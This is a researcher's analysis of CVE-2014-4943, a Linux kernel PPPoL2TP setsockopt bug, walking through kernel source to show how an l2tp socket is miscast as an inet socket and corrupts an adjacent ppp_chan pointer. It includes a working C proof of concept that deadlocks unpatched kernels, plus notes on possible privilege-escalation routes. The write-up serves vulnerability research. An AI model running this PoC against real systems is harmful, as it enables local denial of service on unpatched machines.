CVE-2014-4943 - PPPoL2TP DoS Analysis

Introduction

I've been meaning to look at this issue for a while now but kept postponing it due to other commitments. When I had an initial look at this vulnerability, I thought it was either a use-after-free issue or some arbitrary memory overwrite due to differences between pppol2tp and udp/inet sockets.

This vulnerability was published in July 2014. The CVE descripton states: "The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure differences between an l2tp socket and an inet socket." The git repository fixhas some additional information:

net/l2tp: don't fall back on UDP [get|set]sockopt
The l2tp [get|set]sockopt() code has fallen back to the UDP functions
for socket option levels != SOL_PPPOL2TP since day one, but that has
never actually worked, since the l2tp socket isn't an inet socket.

As David Miller points out:

  "If we wanted this to work, it'd have to look up the tunnel and then
   use tunnel->sk, but I wonder how useful that would be"

Since this can never have worked so nobody could possibly have depended
on that functionality, just remove the broken code and return -EINVAL.

There's currently a public DoS exploit and a privilege escalation exploit (no source code is available) for 32-bit systems from Immunity. I've had some time to perform an initial analysis of the DoS condition and will describe my findings below. Hopefully, this will provide with some insight into this vulnerability and possibly, its successful exploitation. I haven't figured the privilege escalation part yet and would appreciate any tips or ideas. You can contact me on twitter or directly by email.

Before getting into details, it's worth mentioning that the DoS exploit does not "panic" the kernel as stated by the author but simply deadlocks the kernel. There's no kernel oops and the kernel control flow gets stuck in __ticket_spin_lock:

for (;;) { 
        if (inc.head == inc.tail)
                break;
        cpu_relax();
        inc.head = ACCESS_ONCE(lock->tickets.head);
}

The PoC code creates and connects two PX_PROTO_OL2TP sockets which is not necessary for this deadlock condition. The simplified PoC that deadlocks the kernel is shown below:

#define _GNU_SOURCE 1
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <linux/net.h>
#include <linux/udp.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <linux/if_pppol2tp.h>

int main()
{
        int tunnel_fd, udp_fd;
        struct sockaddr_pppol2tp sax;

        tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
        udp_fd = socket(AF_INET, SOCK_DGRAM, 0);

        memset(&sax, 0, sizeof(sax));
        sax.sa_family = AF_PPPOX;
        sax.sa_protocol = PX_PROTO_OL2TP;
        sax.pppol2tp.fd = udp_fd;
        sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        sax.pppol2tp.addr.sin_port = htons(1337);
        sax.pppol2tp.addr.sin_family = AF_INET;
        sax.pppol2tp.s_tunnel = 8;
        sax.pppol2tp.s_session = 0;
        sax.pppol2tp.d_tunnel = 0;
        sax.pppol2tp.d_session = 0;

        connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax));
        int ip_options = 0x1;
        setsockopt(tunnel_fd, SOL_IP, IP_OPTIONS, &ip_options, 20); // deadlock
        exit(0);
}

Vulnerability

The vulnerability is in handling (set|get)sockopt operations for PX_PROTO_OL2TP sockets:

static int pppol2tp_setsockopt(struct socket *sock, int level, int optname,
                               char __user *optval, unsigned int optlen)
{
        struct sock *sk = sock->sk;
        struct l2tp_session *session;
        struct l2tp_tunnel *tunnel;
        struct pppol2tp_session *ps;
        int val;
        int err;

        if (level != SOL_PPPOL2TP)
                return udp_prot.setsockopt(sk, level, optname, optval, optlen);   [1]

        if (optlen < sizeof(int))
                return -EINVAL;
        ...

In [1], if the level is not SOL_PPPOL2TP, udp_prot.setsockopt() is called even though the socket is not a UDP socket! The implementation of the udp_prot.setsockopt() is shown below:

int udp_setsockopt(struct sock *sk, int level, int optname,
                   char __user *optval, unsigned int optlen)
{
        if (level == SOL_UDP  ||  level == SOL_UDPLITE)
                return udp_lib_setsockopt(sk, level, optname, optval, optlen,
                                          udp_push_pending_frames);
        return ip_setsockopt(sk, level, optname, optval, optlen);                 [2]
}

As shown in [2], if the socket level is set to SOL_IP, the ip_setsockopt() is called on the PX_PROTO_OL2TP socket. The ip_setsockopt() then calls a helper function shown below:

static int do_ip_setsockopt(struct sock *sk, int level,
                            int optname, char __user *optval, unsigned int optlen)
{
        struct inet_sock *inet = inet_sk(sk);                                     [3]
        int val = 0, err;

        switch (optname) {
        case IP_PKTINFO:
        case IP_RECVTTL:
     	...

In [3], our socket is typecasted to an inet socket with (struct inet_sock *)sk. The sock struct is 656 bytes in size and inet_sock struct includes the sock struct (as the first element) and is 824 bytes. By setting inet elements, we operate on 824 - 656 = 168 bytes that are inet_sock specific. Since our socket is not an inet_sock, we are changing elements belonging to an adjacent data structure. This adjacent data structure happens to be struct ppp_chan, i.e., we have a sock struct dynamic allocation followed by ppp_chan.

The PoC code uses the setsockopt optname IP_OPTIONS which does the following in do_ip_setsockopt():

        switch (optname) {
        case IP_OPTIONS:
        {
                struct ip_options_rcu *old, *opt = NULL;

                if (optlen > 40)
                        goto e_inval;
                err = ip_options_get_from_user(sock_net(sk), &opt,                [4]
                                               optval, optlen);
                if (err)
                        break;
                old = rcu_dereference_protected(inet->inet_opt,
                                                sock_owned_by_user(sk));
                if (inet->is_icsk) {
                        struct inet_connection_sock *icsk = inet_csk(sk);
#if IS_ENABLED(CONFIG_IPV6)
                        if (sk->sk_family == PF_INET ||
                            (!((1 << sk->sk_state) &
                               (TCPF_LISTEN | TCPF_CLOSE)) &&
                             inet->inet_daddr != LOOPBACK4_IPV6)) {
#endif
                                if (old)
                                        icsk->icsk_ext_hdr_len -= old->opt.optlen;
                                if (opt)
                                        icsk->icsk_ext_hdr_len += opt->opt.optlen;
                                icsk->icsk_sync_mss(sk, icsk->icsk_pmtu_cookie);
#if IS_ENABLED(CONFIG_IPV6)
                        }
#endif
                }
                rcu_assign_pointer(inet->inet_opt, opt);                          [5]
                if (old)
                        kfree_rcu(old, rcu);
                break;
        }
        case IP_PKTINFO:
        ...

In [4], an ip_options_rcu struct is allocated and then in [5], inet->inet_opt is set to point to this newly allocated struct. The inet->inet_opt pointer is aligned with (struct * ppp_chan)->ppp. Hence, setting the inet->inet_opt pointer overwrites (struct * ppp_chan)->ppp with a valid kernel pointer to struct ip_options_rcu.

Finally, when closing the PPPOL2TP socket, the ppp_unregister_channel() function is called:

void
ppp_unregister_channel(struct ppp_channel *chan)
{
        struct channel *pch = chan->ppp;
        struct ppp_net *pn;

        if (!pch)                                                                 [6]
                return;         /* should never happen */

        chan->ppp = NULL;

        /*
         * This ensures that we have returned from any calls into the
         * the channel's start_xmit or ioctl routine before we proceed.
         */
        down_write(&pch->chan_sem);
        spin_lock_bh(&pch->downl);
        pch->chan = NULL;
        spin_unlock_bh(&pch->downl);
        up_write(&pch->chan_sem);
        ...

In [6], our ppp overwritten value is checked. Since it's pointing to a valid allocated memory region within the kernel space, some locking is followed. This is where the deadlock happens.

Exploitation Vectors

I haven't explored the udp_setsockopt() option yet. However, I couldn't find any function or data pointers that can be overwritten with ip_setsockopt() to redirect the control flow to user space.

A possible exploitation vector is to take advantage of the struct adjacency by forcing structs containing function pointers to be allocated close to the PPPOL2TP socket struct. As mentioned above, there's a 32-bit exploit and it looks like this exploit is taking advantage of some race condition. I haven't verified this on a 32-bit system and it's possible that function or data pointers are aligned differently and are easier to exploit.